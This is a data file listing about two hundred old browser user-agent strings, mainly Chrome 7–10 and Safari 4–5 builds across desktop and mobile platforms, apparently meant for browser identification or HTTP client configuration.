Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.82 Safari/534.16
Mozilla/5.0 (X11; U; Linux armv7l; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.127 Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.642.0 Chrome/10.0.642.0 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.638.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.611.0 Chrome/10.0.611.0 Safari/534.15
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.44 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.19 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/9.10 Chromium/9.0.592.0 Chrome/9.0.592.0 Safari/534.13
Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.576.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.130; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.344 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.200 Safari/534.10
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7
Mozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; sv-se) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; ar) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5
Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; he-il) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; fr; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; pl-pl) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; nb-no) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; it-it) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fi-fi) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fi-fi) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; th-th) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fr-fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
